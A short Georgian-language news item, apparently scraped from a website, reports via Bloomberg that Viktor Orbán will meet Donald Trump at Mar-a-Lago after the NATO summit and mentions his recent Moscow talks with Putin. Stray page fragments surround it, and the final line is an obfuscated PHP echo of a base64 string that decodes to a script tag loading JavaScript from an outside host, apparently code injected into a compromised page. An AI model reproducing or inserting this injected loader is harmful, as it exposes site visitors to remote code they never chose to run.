celsiusi
ავერსი შნაიდერი

 ვიქტორ ორბანი დონალდ ტრამპს შეხვდება, - ამის შესახებ ინფორმაციას სააგენტო Bloomberg-ი ინფორმირებულ წყაროზე დაყრდნობით ავრცელებს.

სააგენტოს ცნობით, 11 ივლისს ვაშინგტონში ნატო-ს სამიტის დასრულების შემდეგ, უნგრეთის პრემიერ-მინისტრი აშშ-ის ყოფილ პრეზიდენტს მარ-ა-ლაგოს რეზიდენციაში ეწვევა.

წყაროს ცნობით, ფლორიდაში უნგრეთის პრემიერის ვიზიტი არაფორმალური შეხვედრის ხასიათს ატარებს. მისივე განცხადებით, მოსკოვსა და კიევს შორის რაიმე სახის სამშვიდობო შეთანხმებისთვის საფუძვლის ჩაყრა დონალდ ტრამპს ვიქტორ ორბანისთვის არ უთხოვია.

ცნობისთვის, ვიქტორ ორბანი გასულ კვირას მოსკოვში იმყოფებოდა, სადაც ვლადიმერ პუტინთან მოლაპარაკებები გამართა.

130
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");